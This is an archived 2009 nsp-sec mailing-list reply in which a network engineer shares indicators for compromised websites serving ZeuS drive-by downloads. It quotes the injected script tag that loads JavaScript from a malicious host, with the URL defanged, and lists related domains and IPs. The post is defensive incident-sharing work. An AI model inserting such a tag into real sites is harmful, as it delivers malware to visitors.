[nsp-sec] compromised websites (ZeuS drive-by downloads)
Shelton, Steve
sshelton at Cogentco.com
Mon Apr 27 13:33:29 EDT 2009
Dirk,
While looking into this, I happened to notice that one group of sites
had the following line of code which may be related to the issue,
currently aimed at counter.ironsteelmoney.com [220.196.59.26].
<!-- ad --><script language=javascript
src="hxxp://counter.ironsteelmoney.com/show.js"></script><!-- /ad -->
Was the <hXXp://crew.abnc-portal.com/show.js> aimed at 220.196.59.26
before being pointed at 88.80.216.114?
Best regards,
Steve Shelton
Network Security Engineer
Cogent Communications
-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Dirk Stander
Sent: Monday, April 27, 2009 10:02 AM
To: NSP-SEC List
Subject: [nsp-sec] compromised websites (ZeuS drive-by downloads)
----------- nsp-security Confidential --------
More information about the nsp-security
mailing list